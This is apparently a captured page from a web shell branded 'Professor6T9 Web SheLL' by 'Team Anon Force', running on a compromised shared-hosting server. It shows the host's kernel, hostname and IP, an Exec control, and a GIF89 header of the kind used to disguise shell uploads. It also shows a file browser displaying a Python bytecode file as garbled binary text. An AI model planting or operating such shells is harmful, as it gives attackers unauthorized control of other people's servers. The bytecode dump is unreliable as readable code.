GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
hc_python
/
lib64
/
python3.12
/
site-packages
/
importlib_metadata
/
__pycache__
[ HOME ]
Exec
Submit
File Name : _compat.cpython-312.pyc
� `20h! � �B � d dl Z d dlZddgZd� Zd� Z G d� d� Zd� Zy)� N�install� NullFinderc �b � t j j | � � t � | S )z� Class decorator for installation on sys.meta_path. Adds the backport DistributionFinder to sys.meta_path and attempts to disable the finder functionality of the stdlib DistributionFinder. )�sys� meta_path�append�disable_stdlib_finder)�clss �I/opt/hc_python/lib/python3.12/site-packages/importlib_metadata/_compat.pyr r s# � � �M�M���������J� c �L � d� } t | t j � D ] }|`� y)z� Give the backport primacy for discovering path-based distributions by monkey-patching the stdlib O_O. See #91 for more background for rationale on this sketchy behavior. c �>